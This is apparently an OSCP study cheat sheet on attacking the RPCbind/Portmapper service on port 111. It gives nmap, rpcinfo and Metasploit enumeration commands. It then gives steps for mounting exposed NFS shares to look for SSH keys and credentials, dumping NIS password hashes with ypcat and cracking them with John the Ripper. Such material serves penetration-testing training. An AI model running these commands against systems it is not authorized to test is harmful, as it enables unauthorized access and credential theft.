Portmapper - Port 111/TCP/UDP
Basic info
Port 111 is associated with the RPCbind (Portmapper) service, a critical component in Unix-based systems that maps RPC (Remote Procedure Call) services to port numbers. It is often exploited by attackers to gather information about the target system, such as its operating system, RPC-based services (e.g., NFS, NIS), and even user details.
Default Port: 111/TCP/UDP
Other Ports: 32771 (in Oracle Solaris systems)
Associated Services: RPCbind, NFS, NIS, rusersd
Enumeration Techniques
Nmap
Start with an aggressive Nmap scan to gather initial information about the service:
nmap -sSUC -p 111 <Target>
NSE Scripts in Nmap
Leverage Nmap's built-in NSE scripts for RPC enumeration:
nmap -sV --script=nfs-ls,nfs-statfs,nfs-showmount -p 111,2049 <target-ip>
Rpcinfo
Use the rpcinfo
tool to query the RPCbind service for additional details:
rpcinfo -p <target-ip>
Example output:
program vers proto port
100000 2 tcp 111 portmapper
100005 1 udp 2049 mountd
The presence of services like mountd
indicates NFS might be exploitable.
Metasploit for RPC Enumeration
Use Metasploitβs auxiliary modules for RPC enumeration:
use auxiliary/scanner/misc/rpcinfo
set RHOSTS <target-ip>
run
Metasploit automates the extraction of program and version information.
Exploitation Techniques
RPCBind + NFS
If NFS is discovered (commonly on port 2049), use the following tools for further exploitation:
Showmount Enumerate exported NFS shares:
showmount -e <target-ip>
Mount the Share Mount the NFS share locally:
mount -t nfs <target-ip>:/share /mnt
Explore Files After mounting, look for sensitive files such as SSH keys, credentials, or configurations.
NIS Enumeration
NIS requires identifying the domain name and server. Use these commands to enumerate:
apt-get install nis
ypwhich -d <domain-name> <server-ip>
# Extract sensitive data (e.g., user credentials)
ypcat -d <domain-name> -h <server-ip> passwd.byname
Output from ypcat
can reveal hashed passwords. Crack them with tools like John the Ripper:
john --wordlist=<wordlist> <hash-file>
RPC Users
Identify and exploit rusersd to enumerate users:
rpcinfo -p <target-ip> | grep rusersd
Tools like rusers
provide user enumeration:
rusers <target-ip>
Learn & practice For the OSCP.
Last updated
Was this helpful?